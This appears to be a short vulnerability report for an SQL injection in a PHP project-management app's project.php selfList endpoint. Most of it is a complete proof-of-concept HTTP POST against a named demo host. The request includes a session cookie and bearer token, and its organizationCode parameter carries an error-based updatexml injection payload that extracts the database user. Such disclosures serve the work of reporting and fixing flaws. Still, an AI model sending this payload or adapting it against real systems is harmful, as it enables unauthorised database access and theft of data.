There is a SQL vulnerability in project.php

[WhyUBullyMeXcc]

Login to demo account

In line 242 of the selfList method in the project.php file, pass the controllable request parameters memberCode and organizationCode into the getMemberProjects function, and the memberCode must be legal and exist in the database.

The SQL statement in the getMemberProjects function is directly spliced with the organizationCode parameter, causing the SQL statement to be closed, and then the malicious, closed SQL statement will enter the query method for execution, and the attacker can use it to obtain data

POC:
POST /index.php/project/project/selfList HTTP/2
Host: beta.vilson.xyz
Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo
Content-Length: 168
Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
Organizationcode: 6v7be19pwman2fird04gqu53
Sec-Ch-Ua-Mobile: ?0
Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, /
Sec-Ch-Ua-Platform: "macOS"
Origin: https://beta.vilson.xyz
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://beta.vilson.xyz/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

delete=0&all=0&page=1&pageSize=20&organizationCode=6v7be19pwman2fird04gqu53'+and+updatexml(1,concat(0x7e,(select+user()),0x7e),1)%23&memberCode=6v7be19pwman2fird04gqu53

Screenshot of a successful attack:

[839536]

Thank you. Your email is received and will be handled  as soon as possible.